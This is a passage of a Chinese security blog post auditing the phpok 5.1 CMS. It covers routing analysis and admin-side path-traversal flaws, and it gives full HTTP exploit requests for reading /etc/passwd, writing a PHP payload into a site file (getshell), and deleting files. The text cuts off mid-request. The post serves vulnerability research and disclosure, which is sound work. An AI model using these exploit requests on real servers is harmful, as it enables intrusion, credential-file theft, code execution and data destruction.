<!DOCTYPE html>












  


<html class="theme-next pisces use-motion" lang="en">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2"/>
<meta name="theme-color" content="#222">






  
  
    
    
  <script src="/lib/pace/pace.min.js?v=1.0.2"></script>
  <link href="/lib/pace/pace-theme-center-circle.min.css?v=1.0.2" rel="stylesheet">







<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />






















<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=6.3.0" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/favicon1.ico?v=6.3.0">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon1.ico?v=6.3.0">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon1.ico?v=6.3.0">


  <link rel="mask-icon" href="/images/favicon1.ico?v=6.3.0" color="#222">









<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '6.3.0',
    sidebar: {"position":"left","display":"always","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="文章首发：安全客  前言：最近审了一下phpok，能力有限，目前找到的大部后台一些能利用的洞，涉及到的漏洞类型也挺多的，能getshell，在这里分享一些自己的拙见~">
<meta name="keywords" content="Web,代码审计">
<meta property="og:type" content="article">
<meta property="og:title" content="phpok 最新版（5.1） 审计">
<meta property="og:url" content="http://0day.design/2019/03/07/phpok 最新版（5.1） 审计/index.html">
<meta property="og:site_name" content="Passer6y&#39;s Blog">
<meta property="og:description" content="文章首发：安全客  前言：最近审了一下phpok，能力有限，目前找到的大部后台一些能利用的洞，涉及到的漏洞类型也挺多的，能getshell，在这里分享一些自己的拙见~">
<meta property="og:locale" content="en">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/zlxqgpk6lnjnh5bjm4ajyn0m/image_1d4l2nmm01gsc1k06f30qjqsrl9.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/kccx9ephq6ctm4olaje1rf6o/image_1d4cm58lf1oqb17lf13h7c6ncvc9.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/ehejnl7eo1wwq6qk9exaew35/image_1d4l30uhq19daamv1mej17731drmm.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/kdq6c1wupjw5n6mmgu3rucgy/image_1d4l36cio8m11o13c87e5crr513.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/dygurkcwqte8y7gpub64bj4a/image_1d4l39hud1krpd401i9d51lp0v2g.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/1d5orre48mzx3jw15dg7rkgo/image_1d4l3gobj145fo0v1rov16hh1q6m2t.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/x5rn1nz23qc78pah3mymjz7z/image_1d4l3lc5l6g7f571qp13nd10283a.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/j0v5o5eyxn3ae734kbqn1ob9/image_1d4cm983ng031ntgjpr1cah1co7m.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/p13wmvj4khkxren72b6fdvhj/image_1d4agk20clki110s1ii7u6q1gah9.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/3jsnuyq9m72tfqg330ytcfib/image_1d4agn7g08k431a1fsakoi1kjdm.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/fgpw2yg6wjc5o5r1hm9fqx08/image_1d4ai86gk1ukh1dd0lgt83e6nl9.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/r72b5eovgrfy2j0oeeeei79x/image_1d4l4l7km1eaimer1c8ld1c18sv9.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/pv6mu4h93o84a3o6vbjck74b/image_1d4i1bkhf1fbq1q6nk7g19pe1hjl23.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/pfb89v0i59glsveyitgnmsa5/image_1d4i1oe4tg81163s1hcn18a21kp530.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/hg2cxnqchsm3renmw1sjlvfr/image_1d4i1pat21lbr1fe518r01rf2tjs3d.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/p2zlylym1mfm33vj2rjbmgw5/image_1d4l4ok81h0c1ee2dk2ann3p1m.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/bs2osjm0xntsb9zqzhl9ulyo/image_1d4i1rfar1g7u1ieefsrd4dd0l3q.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/awxmk7gqoazwfskrczgm6diu/image_1d4l58h6eo1l7892im1v7g16352g.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/jyu4m8ywltgdccn0qugy8chf/image_1d4l59l5p1j23upj6grfd1a842t.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/344q4ca2sky0t9anxcdwv1ez/image_1d4l5c0qh1h79tbr16bj1i191a223a.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/tkwncti7c0woomb9v86n13bh/image_1d4l5lbfr1fek1kfa1a9i1nta1hcn47.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/fpwbu40s2yhrz8u9bobpypgy/image_1d4l5pf9lkqtv2q8cr1t6f6ku4k.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/uqtqxwzg456sh1iuoxi1vcpa/image_1d4l51jr2o901dl4r9ff6vfus13.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/v8l0twvzk43u4oyzev8zes3m/image_1d4ig2hol1ok17857k61r66bv74k.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/zb6si257j56p2qexs7ecsed1/image_1d4l604qqo9c1krlerf7eu1o1b51.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/5zowcit791ndjvyt3vxp5yb7/image_1d4l61nqml2roi8i4jv1j1aif5e.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/1a2eynhxyhmmljm5z9ok36qx/image_1d4ijnk021ui812v11pc8fap1sb351.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/f3046swiq74ti2j1iy4bkx0u/image_1d4jrep0n147ufdpgr21k8md3a9.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/w72a50ygueplfvt39s3gj3a4/image_1d4l6afmq17svv8q28m3ev1sih5r.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/0dffvgai9y9fd4cv0bozqgjl/image_1d4juou7p14v9nli1isr1u561ee51m.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/6vda01kdf6371cgnylfro3p3/image_1d4l6siej1ud37qu1ebv1fd11d1m9.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/nyc1cs1p2pcmesp9fw5rmvr5/image_1d4l7b4pd1d0186u17a8cm1ehsm.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/exb2sbtm64zn2dpmlgsx58xj/image_1d4l7d16r1aqq19ov1fn312vi10k023.png">
<meta property="og:updated_time" content="2019-04-15T02:02:18.574Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="phpok 最新版（5.1） 审计">
<meta name="twitter:description" content="文章首发：安全客  前言：最近审了一下phpok，能力有限，目前找到的大部后台一些能利用的洞，涉及到的漏洞类型也挺多的，能getshell，在这里分享一些自己的拙见~">
<meta name="twitter:image" content="http://static.zybuluo.com/Passer6y/zlxqgpk6lnjnh5bjm4ajyn0m/image_1d4l2nmm01gsc1k06f30qjqsrl9.png">



  <link rel="alternate" href="/atom.xml" title="Passer6y's Blog" type="application/atom+xml" />




  <link rel="canonical" href="http://0day.design/2019/03/07/phpok 最新版（5.1） 审计/"/>



<script type="text/javascript" id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>phpok 最新版（5.1） 审计 | Passer6y's Blog</title>
  






  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?14e9c0326e763de8b0a61711cc963a58";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>




  <noscript>
  <style type="text/css">
    .use-motion .motion-element,
    .use-motion .brand,
    .use-motion .menu-item,
    .sidebar-inner,
    .use-motion .post-block,
    .use-motion .pagination,
    .use-motion .comments,
    .use-motion .post-header,
    .use-motion .post-body,
    .use-motion .collection-title { opacity: initial; }

    .use-motion .logo,
    .use-motion .site-title,
    .use-motion .site-subtitle {
      opacity: initial;
      top: initial;
    }

    .use-motion {
      .logo-line-before i { left: initial; }
      .logo-line-after i { right: initial; }
    }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Passer6y's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="Toggle navigation bar">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">
    <a href="/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-home"></i> <br />首页</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-ctf">
    <a href="/categories/CTF/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-flag"></i> <br />CTF</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-web">
    <a href="/categories/Web/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-jsfiddle"></i> <br />Web</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-code">
    <a href="/categories/Code/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-code"></i> <br />Code</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-internet">
    <a href="/categories/Internet/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-wifi"></i> <br />内网渗透</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-others">
    <a href="/categories/Others/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-eye"></i> <br />Others</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">
    <a href="/archives/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-folder-open"></i> <br />归档</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-tags">
    <a href="/tags/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />标签</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-about">
    <a href="/About/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-user"></i> <br />关于</a>
  </li>

      
      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />Search</a>
        </li>
      
    </ul>
  

  

  
    <div class="site-search">
      
  
  <div class="algolia-popup popup search-popup">
    <div class="algolia-search">
      <div class="algolia-search-input-icon">
        <i class="fa fa-search"></i>
      </div>
      <div class="algolia-search-input" id="algolia-search-input"></div>
    </div>

    <div class="algolia-results">
      <div id="algolia-stats"></div>
      <div id="algolia-hits"></div>
      <div id="algolia-pagination" class="algolia-pagination"></div>
    </div>

    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
  </div>




    </div>
  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
            

          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  
    <div class="reading-progress-bar"></div>
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://0day.design/2019/03/07/phpok 最新版（5.1） 审计/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Passer6y">
      <meta itemprop="description" content="A salty fish">
      <meta itemprop="image" content="/images/21.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Passer6y's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">phpok 最新版（5.1） 审计
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              

              
                
              

              <time title="Created: 2019-03-07 16:46:00" itemprop="dateCreated datePublished" datetime="2019-03-07T16:46:00+08:00">2019-03-07</time>
            

            
              

              
                
                <span class="post-meta-divider">|</span>
                

                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Edited on</span>
                
                <time title="Modified: 2019-04-15 10:02:18" itemprop="dateModified" datetime="2019-04-15T10:02:18+08:00">2019-04-15</time>
              
            
          </span>

          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a href="/2019/03/07/phpok 最新版（5.1） 审计/#comments" itemprop="discussionUrl">
                  <span class="post-meta-item-text">Comments: </span> <span class="post-comments-count valine-comment-count" data-xid="/2019/03/07/phpok 最新版（5.1） 审计/" itemprop="commentCount"></span>
                </a>
              </span>
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>文章首发：<a href="https://www.anquanke.com/post/id/172110" target="_blank" rel="noopener">安全客</a> </p>
<p>前言：最近审了一下phpok，能力有限，目前找到的大部后台一些能利用的洞，涉及到的漏洞类型也挺多的，能getshell，在这里分享一些自己的拙见~<br><a id="more"></a></p>
<h2 id="基本分析"><a href="#基本分析" class="headerlink" title="基本分析"></a>基本分析</h2><p>官网下载最新的phpok 5.1版本：<a href="https://phpok.com" target="_blank" rel="noopener">https://phpok.com</a></p>
<p>首先可以黑白盒结合的方式来分析路由解析规则：<br><img src="http://static.zybuluo.com/Passer6y/zlxqgpk6lnjnh5bjm4ajyn0m/image_1d4l2nmm01gsc1k06f30qjqsrl9.png" alt="image_1d4l2nmm01gsc1k06f30qjqsrl9.png-95.9kB"></p>
<p>跟目下有这么几个入口文件：<br><img src="http://static.zybuluo.com/Passer6y/kccx9ephq6ctm4olaje1rf6o/image_1d4cm58lf1oqb17lf13h7c6ncvc9.png" alt="image_1d4cm58lf1oqb17lf13h7c6ncvc9.png-100.1kB"></p>
<p>纵览整个目录，容易发现该程序是<a href="https://baike.baidu.com/item/MVC%E6%A1%86%E6%9E%B6/9241230?fr=aladdin&amp;fromid=85990&amp;fromtitle=MVC" target="_blank" rel="noopener">mvc的模式</a>来编写的，至少有三个入口：<br>index.php,api.php,admin.php</p>
<p>所以，我们可以打开框架目录<code>framework/</code>来印证这个猜想：<br><img src="http://static.zybuluo.com/Passer6y/ehejnl7eo1wwq6qk9exaew35/image_1d4l30uhq19daamv1mej17731drmm.png" alt="image_1d4l30uhq19daamv1mej17731drmm.png-122.9kB"></p>
<p>这时候我们可以结合黑盒的方式看具体的解析到具体文件(控制器)以及具体的方法的过程，安装后网站后，随便点开个页面，观察参数变化：<br><img src="http://static.zybuluo.com/Passer6y/kdq6c1wupjw5n6mmgu3rucgy/image_1d4l36cio8m11o13c87e5crr513.png" alt="image_1d4l36cio8m11o13c87e5crr513.png-55.1kB"><br>再看看后台：<br><img src="http://static.zybuluo.com/Passer6y/dygurkcwqte8y7gpub64bj4a/image_1d4l39hud1krpd401i9d51lp0v2g.png" alt="image_1d4l39hud1krpd401i9d51lp0v2g.png-92.8kB"></p>
<p>到这里其实差不多已经知道解析规则了，比如：<br><code>http://phpok/index.php?c=cart&amp;f=checkout&amp;id[]=2</code></p>
<ul>
<li>入口：<code>index.php</code></li>
<li>控制器：参数<code>c=cart</code>，对应着框架目录<code>www</code>模块，路径：<code>framework/www/cart_control.php</code><br><img src="http://static.zybuluo.com/Passer6y/1d5orre48mzx3jw15dg7rkgo/image_1d4l3gobj145fo0v1rov16hh1q6m2t.png" alt="image_1d4l3gobj145fo0v1rov16hh1q6m2t.png-76.4kB"></li>
<li>方法：参数<code>f=checkout</code>，对应着<code>checkout_f()</code>方法<br><img src="http://static.zybuluo.com/Passer6y/x5rn1nz23qc78pah3mymjz7z/image_1d4l3lc5l6g7f571qp13nd10283a.png" alt="image_1d4l3lc5l6g7f571qp13nd10283a.png-90.3kB"></li>
</ul>
<blockquote>
<p>路由文件中会自动将f参数最后加入<code>_f</code></p>
</blockquote>
<p>反观，比如我们要调用<code>framework/admin/freight_control.php</code>的<code>price_save_f()</code>方法：<br><img src="http://static.zybuluo.com/Passer6y/j0v5o5eyxn3ae734kbqn1ob9/image_1d4cm983ng031ntgjpr1cah1co7m.png" alt="image_1d4cm983ng031ntgjpr1cah1co7m.png-230.7kB"></p>
<p>对应的url即：<code>http://phpok/admin.php?c=freight&amp;f=price_save</code></p>
<p><strong>即在控制器中，只有以<code>_f</code>结尾的函数名可以直接调用</strong></p>
<p>知道文件解析规则了，下面就可以从入口开始审，审全局过滤，审相关敏感函数进行回溯等等。</p>
<h2 id="变量覆盖"><a href="#变量覆盖" class="headerlink" title="变量覆盖"></a>变量覆盖</h2><p>从框架入口跟进后，发现<code>framework/init.php</code> 1611行存在<code>parse_str</code>变量覆盖<br><img src="http://static.zybuluo.com/Passer6y/p13wmvj4khkxren72b6fdvhj/image_1d4agk20clki110s1ii7u6q1gah9.png" alt="image_1d4agk20clki110s1ii7u6q1gah9.png-146.3kB"></p>
<p><code>$query_string</code>参数从<code>framework/libs/server.php</code> 94行传入：</p>
<p><img src="http://static.zybuluo.com/Passer6y/3jsnuyq9m72tfqg330ytcfib/image_1d4agn7g08k431a1fsakoi1kjdm.png" alt="image_1d4agn7g08k431a1fsakoi1kjdm.png-135.9kB"></p>
<p>比如访问：<code>http://phpok/?data[script]=passer6y</code><br><img src="http://static.zybuluo.com/Passer6y/fgpw2yg6wjc5o5r1hm9fqx08/image_1d4ai86gk1ukh1dd0lgt83e6nl9.png" alt="image_1d4ai86gk1ukh1dd0lgt83e6nl9.png-228.1kB"></p>
<p>如果想要利用的话最好是能覆盖全局变量，<code>$_SESSION，$config</code>这些，我在尝试覆盖<code>$_SESSION</code>的时候传入<code>?_SESSION[script]=passer6y</code>,经过动态调试后，发现会自动多加一个下划线，变成这样<code>__SESSION[script]=passer6y</code>。</p>
<p>后来也尝试了利用<code>$_GET</code>变量的一些特性在处理参数的时候，会将参数名中的<code>空格</code>、<code>.</code>、<code>[</code>替换成<code>_</code>，比如传入<code>.SESSION[script]=passer6y</code>会解析成<code>_SESSION[script]=passer6y</code>，但最终还是没有成功覆盖，师傅们有好的思路一起来交流交流~</p>
<h2 id="后台任意文件读取"><a href="#后台任意文件读取" class="headerlink" title="后台任意文件读取"></a>后台任意文件读取</h2><p>跟完框架入口核心文件之后，然后进框架目录的www模块,跟完了也没挖到一个洞，接着就开始审核心的libs库，看功能点来回溯，接着就找到了这么些后台洞：</p>
<p><img src="http://static.zybuluo.com/Passer6y/r72b5eovgrfy2j0oeeeei79x/image_1d4l4l7km1eaimer1c8ld1c18sv9.png" alt="image_1d4l4l7km1eaimer1c8ld1c18sv9.png-38.1kB"><br>当时在审框架里面的libs库里的file.php，看到cat命令眼前一亮<br><img src="http://static.zybuluo.com/Passer6y/pv6mu4h93o84a3o6vbjck74b/image_1d4i1bkhf1fbq1q6nk7g19pe1hjl23.png" alt="image_1d4i1bkhf1fbq1q6nk7g19pe1hjl23.png-402.7kB"></p>
<p>回溯到了：<br>framework/admin/tpl_control.php<br><img src="http://static.zybuluo.com/Passer6y/pfb89v0i59glsveyitgnmsa5/image_1d4i1oe4tg81163s1hcn18a21kp530.png" alt="image_1d4i1oe4tg81163s1hcn18a21kp530.png-197.8kB"></p>
<p>framework/admin/appsys_control.php<br><img src="http://static.zybuluo.com/Passer6y/hg2cxnqchsm3renmw1sjlvfr/image_1d4i1pat21lbr1fe518r01rf2tjs3d.png" alt="image_1d4i1pat21lbr1fe518r01rf2tjs3d.png-443.2kB"></p>
<p>有两处均存在该问题：</p>
<p>exp1:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">POST /admin.php?c=appsys&amp;f=file_edit&amp;id=fav&amp;title=../../../../../../../etc/passwd HTTP/1.1</span><br><span class="line">Host: phpok</span><br><span class="line">Cache-Control: max-age=0</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line">User-Agent: Mozilla/5.0 (X11; U; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3690.110 Safari/537.36</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7</span><br><span class="line">Cookie: PHPSESSION=ilc9ev2s0fv8rn9hckfh07hni3; XDEBUG_SESSION=PHPSTORM</span><br><span class="line">Connection: close</span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br><span class="line">Content-Length: 0</span><br></pre></td></tr></table></figure></p>
<p>exp2:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">POST /admin.php?c=tpl&amp;f=edit&amp;id=1&amp;title=../../../../../../../etc/passwd HTTP/1.1</span><br><span class="line">Host: phpok</span><br><span class="line">Cache-Control: max-age=0</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line">User-Agent: Mozilla/5.0 (X11; U; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3690.110 Safari/537.36</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7</span><br><span class="line">Cookie: PHPSESSION=ilc9ev2s0fv8rn9hckfh07hni3; XDEBUG_SESSION=PHPSTORM</span><br><span class="line">Connection: close</span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br><span class="line">Content-Length: 0</span><br></pre></td></tr></table></figure></p>
<p><img src="http://static.zybuluo.com/Passer6y/p2zlylym1mfm33vj2rjbmgw5/image_1d4l4ok81h0c1ee2dk2ann3p1m.png" alt="image_1d4l4ok81h0c1ee2dk2ann3p1m.png-521.8kB"><br><img src="http://static.zybuluo.com/Passer6y/bs2osjm0xntsb9zqzhl9ulyo/image_1d4i1rfar1g7u1ieefsrd4dd0l3q.png" alt="image_1d4i1rfar1g7u1ieefsrd4dd0l3q.png-280.1kB"></p>
<h2 id="后台任意文件写入getshell"><a href="#后台任意文件写入getshell" class="headerlink" title="后台任意文件写入getshell"></a>后台任意文件写入getshell</h2><p>libs库时候发现的，framework/libs/file.php 108行：<br><img src="http://static.zybuluo.com/Passer6y/awxmk7gqoazwfskrczgm6diu/image_1d4l58h6eo1l7892im1v7g16352g.png" alt="image_1d4l58h6eo1l7892im1v7g16352g.png-40.8kB"></p>
<p>跟进<code>make()</code>函数，185行：<br><img src="http://static.zybuluo.com/Passer6y/jyu4m8ywltgdccn0qugy8chf/image_1d4l59l5p1j23upj6grfd1a842t.png" alt="image_1d4l59l5p1j23upj6grfd1a842t.png-220.1kB"><br>可以看到是用来创建文件或目录的函数</p>
<p>继续跟<code>_write()</code>函数，同文件394行：<br><img src="http://static.zybuluo.com/Passer6y/344q4ca2sky0t9anxcdwv1ez/image_1d4l5c0qh1h79tbr16bj1i191a223a.png" alt="image_1d4l5c0qh1h79tbr16bj1i191a223a.png-80.9kB"><br>良心的程序员还帮我们把转义符给去掉了</p>
<p>分析到这里基本可以知道如果<code>vim()</code>函数可控，那么可以写入任意文件</p>
<p>使用phpstorm <code>command+shift+f</code>全局搜索<br><img src="http://static.zybuluo.com/Passer6y/tkwncti7c0woomb9v86n13bh/image_1d4l5lbfr1fek1kfa1a9i1nta1hcn47.png" alt="image_1d4l5lbfr1fek1kfa1a9i1nta1hcn47.png-423.3kB"></p>
<p>在<code>framework/admin/tpl_control.php</code>的383行找到<code>edit_save_f()</code></p>
<p><img src="http://static.zybuluo.com/Passer6y/fpwbu40s2yhrz8u9bobpypgy/image_1d4l5pf9lkqtv2q8cr1t6f6ku4k.png" alt="image_1d4l5pf9lkqtv2q8cr1t6f6ku4k.png-280.9kB"></p>
<p>下面构造exp就很简单了。</p>
<p><img src="http://static.zybuluo.com/Passer6y/uqtqxwzg456sh1iuoxi1vcpa/image_1d4l51jr2o901dl4r9ff6vfus13.png" alt="image_1d4l51jr2o901dl4r9ff6vfus13.png-524.5kB"></p>
<p>exp:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">POST /admin.php?c=tpl&amp;f=edit_save&amp;id=1&amp;title=../../../../../../../Users/passer6y/Documents/www/phpok/version.php&amp;content=&lt;%3fphp+phpinfo()%3becho+&quot;passer6y&quot;%3b%3f&gt; HTTP/1.1</span><br><span class="line">Host: phpok</span><br><span class="line">Cache-Control: max-age=0</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line">User-Agent: Mozilla/5.0 (X11; U; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3690.110 Safari/537.36</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7</span><br><span class="line">Cookie: PHPSESSION=ilc9ev2s0fv8rn9hckfh07hni3; XDEBUG_SESSION=PHPSTORM</span><br><span class="line">Connection: close</span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br><span class="line">Content-Length: 0</span><br></pre></td></tr></table></figure></p>
<p>在framework/admin/tpl_control.php  383行 edit_save_f()函数也有这个问题<br><img src="http://static.zybuluo.com/Passer6y/v8l0twvzk43u4oyzev8zes3m/image_1d4ig2hol1ok17857k61r66bv74k.png" alt="image_1d4ig2hol1ok17857k61r66bv74k.png-383.1kB"></p>
<h2 id="后台任意文件删除"><a href="#后台任意文件删除" class="headerlink" title="后台任意文件删除"></a>后台任意文件删除</h2><p>同样类似的方法在framework/admin/tpl_control.php 303行 <code>delfile_f()</code>函数：<br><img src="http://static.zybuluo.com/Passer6y/zb6si257j56p2qexs7ecsed1/image_1d4l604qqo9c1krlerf7eu1o1b51.png" alt="image_1d4l604qqo9c1krlerf7eu1o1b51.png-247.1kB"></p>
<p>在libs库中，framework/libs/file.php，148行<code>rm()</code>函数也存在该问题<br><img src="http://static.zybuluo.com/Passer6y/5zowcit791ndjvyt3vxp5yb7/image_1d4l61nqml2roi8i4jv1j1aif5e.png" alt="image_1d4l61nqml2roi8i4jv1j1aif5e.png-151.4kB"></p>
<p>exp：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">POST /admin.php?c=tpl&amp;f=delfile&amp;id=1&amp;title=../../../../../../../Users/passer6y/Documents/www/phpok/version.php HTTP/1.1</span><br><span class="line">Host: phpok</span><br><span class="line">Cache-Control: max-age=0</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line">User-Agent: Mozilla/5.0 (X11; U; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3690.110 Safari/537.36</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8</span><br><span 